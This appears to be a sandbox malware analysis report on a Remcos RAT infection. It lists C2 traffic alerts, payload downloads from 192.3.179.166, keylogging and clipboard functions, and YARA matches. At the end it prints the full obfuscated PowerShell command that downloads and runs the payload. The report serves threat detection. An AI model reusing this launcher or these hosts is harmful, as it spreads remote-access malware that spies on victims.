                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49884 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49894 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49906 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49915 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49922 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49929 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49938 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49951 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49945 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49968 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49974 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49980 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49959 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49987 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49993 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50009 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50028 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50015 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50044 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50049 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50003 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50055 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50063 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50066 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50067 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50065 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50068 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50069 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50060 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50071 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50074 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50061 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50073 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50064 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50075 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50078 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50080 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50076 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50081 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50085 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50084 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49899 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50082 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50070 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50038 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50062 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49734 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49843 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50072 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50079 -> 107.173.4.16:2560
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50083 -> 107.173.4.16:2560
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 107.173.4.16
                Source: global trafficTCP traffic: 192.168.2.4:49731 -> 107.173.4.16:2560
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 16 Dec 2024 16:30:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 16 Dec 2024 12:01:19 GMTETag: "84000-62961f03fa810"Accept-Ranges: bytesContent-Length: 540672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a4 b1 e4 47 e0 d0 8a 14 e0 d0 8a 14 e0 d0 8a 14 fe 82 1f 14 f9 d0 8a 14 fe 82 0e 14 d2 d0 8a 14 fe 82 09 14 60 d0 8a 14 c7 16 f1 14 e3 d0 8a 14 e0 d0 8b 14 60 d0 8a 14 fe 82 00 14 e1 d0 8a 14 fe 82 1e 14 e1 d0 8a 14 fe 82 1b 14 e1 d0 8a 14 52 69 63 68 e0 d0 8a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 61 1b d4 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 9a 07 00 00 12 01 00 00 00 00 00 52 85 00 00 00 10 00 00 00 b0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 74 f2 08 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 9e 07 00 28 00 00 00 00 70 08 00 68 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 38 00 00 18 00 00 00 08 38 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ce 98 07 00 00 10 00 00 00 9a 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 dc b0 00 00 00 b0 07 00 00 64 00 00 00 9e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 3d 00 00 00 70 08 00 00 3e 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: Joe Sandbox ViewIP Address: 192.3.179.166 192.3.179.166
                Source: Joe Sandbox ViewIP Address: 107.173.4.16 107.173.4.16
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: GET /75/ecome.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.179.166Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_028C7A18 URLDownloadToFileW,3_2_028C7A18
                Source: global trafficHTTP traffic detected: GET /75/ecome.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.179.166Connection: Keep-Alive
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.179.166/75/ecome.ex
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1821174062.0000000006DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.179.166/75/ecome.exe
                Source: powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.179.166/75/ecome.exenG
                Source: powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.179.166/75/ecome.exeo
                Source: powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.179.166/75/ecome.exewC:
                Source: nicetomeetyousweeet.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: nicetomeetyousweeet.exe, 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, nicetomeetyousweeet.exe, 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, nicetomeetyousweeet.exe, 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000003.00000002.1821174062.0000000006E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/indowsErrorReporting
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000006_2_004099E4
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_00409B10
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041BB71 SystemParametersInfoW,6_2_0041BB71
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041BB77 SystemParametersInfoW,6_2_0041BB77
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079BDD8 SystemParametersInfoW,6_2_0079BDD8
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079BDDE SystemParametersInfoW,6_2_0079BDDE

                System Summary

                barindex
                Detected Cobalt Strike Beacon
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
